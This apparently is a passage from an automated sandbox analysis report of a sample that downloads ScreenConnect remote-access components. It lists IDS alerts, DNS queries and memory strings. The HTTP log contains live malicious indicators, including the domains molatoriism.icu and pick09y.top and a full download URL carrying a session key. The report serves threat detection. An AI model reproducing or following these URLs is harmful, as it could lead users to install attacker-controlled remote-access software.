                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49715
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49721
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49742
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49717
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49757
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49747
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49795
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49764
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49808
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49897
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: molatoriism.icu
                  Source: global trafficDNS traffic detected: DNS query: pick09y.top
                  Source: svchost.exe, 0000000D.00000003.2630973958.000001D224B79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.8
                  Source: svchost.exe, 0000000D.00000003.2614528765.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D22427F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D224281000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 0000000D.00000002.3888112715.000001D22526A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3888225184.000001D22528D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: pzPO97QouM.exe, 00000000.00000002.3001524787.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: dfsvc.exe, 00000001.00000002.3918005065.00000235717FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0
                  Source: dfsvc.exe, 00000001.00000002.3918005065.00000235717FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0AeB
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000003.00000002.3749275976.00000133B0C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: dfsvc.exe, 00000001.00000002.3915104287.0000023570CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningR
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: dfsvc.exe, 00000001.00000002.3918005065.00000235717FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCer
                  Source: dfsvc.exe, 00000001.00000002.3918005065.00000235717FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCerA
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.3916964873.00000235716D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.3915848532.000002357165D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabk
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
                  Source: svchost.exe, 0000000D.00000003.2614528765.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2631010430.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2645030441.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2519973205.000001D224B29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630990946.000001D224B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D22428C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 0000000D.00000002.3887410161.000001D224B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 0000000D.00000003.2645030441.000001D224B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2519973205.000001D224B29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630990946.000001D224B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 0000000D.00000002.3887410161.000001D224B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 0000000D.00000003.2631010430.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxV
                  Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: pzPO97QouM.exe, 00000000.00000002.3001524787.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.dig
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350024F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.co
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F43B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl/
                  Source: svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 0000000D.00000002.3887410161.000001D224B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 0000000D.00000002.3888112715.000001D22526A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue02
                  Source: svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
                  Source: svchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustp
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3889817290.0000000001772000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                  Source: pzPO97QouM.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 0000000D.00000003.2614693181.000001D225264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.(
                  Source: dfsvc.exe, 00000001.00000002.3886946834.0000023500658000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350061D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887186855.000001D224302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.3886946834.0000023500658000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235006F0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.3886946834.0000023500089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.3886946834.0000023500089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
